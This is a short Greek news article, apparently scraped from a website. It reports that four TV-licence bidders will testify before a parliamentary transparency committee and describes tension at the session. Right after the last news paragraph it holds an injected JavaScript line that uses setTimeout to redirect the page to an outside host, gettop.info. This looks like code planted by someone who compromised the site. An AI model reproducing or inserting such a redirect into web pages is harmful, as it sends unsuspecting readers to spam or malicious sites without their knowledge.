Στην Επιτροπή Θεσμών και Διαφάνειας οι Αλαφούζος, Καλογρίτσας, Κυριακού, Μαρινάκης

0
5

 

Έπειτα από αίτημα της αντιπολίτευσης που έγινε δεκτό, θα καταθέσουν στην Επιτροπή Θεσμών και Διαφάνειας οι τέσσερις υπερθεματιστές των τηλεοπτικών αδειών (Αλαφούζος, Καλογρίτσας, Κυριακού, Μαρινάκης). Στην Επιτροπή θα παραστούν προκειμένου να ενημερώσουν οι υπουργός Επικρατείας Νίκος Παππάς και γενικός γραμματέας Ενημέρωσης Λευτέρης Κρέτσος.

Το αίτημα για την παρουσία στην Επιτροπή των τεσσάρων υπερθεματιστών υπέβαλαν οι βουλευτές από τη Νέα Δημοκρατία, οι οποίοι επικαλέστηκαν δημοσιεύματα και ρεπορτάζ για την προέλευση των χρημάτων του Χρ. καλογρίτσα αλλά και ο πρώην πρόεδρος του ΠΑΣΟΚ Ευάγγελος Βενιζέλος.

Στη συνεδρίαση της ΕΠιτροπής υπήρξε αρκετή ένταση καθώς αρχικά η πρόεδρος Τασία Χριστοδουλοπούλου υποστήριξε ότι το αίτημα της αντιπολίτευσης δεν μπορεί να γίνει δεκτό επειδή η Επιτροπή δεν είναι αρμόδια. Επιπλέον είπε ότι η Δικαιοσύνη είναι αρμόδια να κρίνει τον διαγωνισμό ενώ διέκοψε για λίγα λεπτά τη συνεδρίαση προκειμένου να εκτονωθεί η ένταση. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here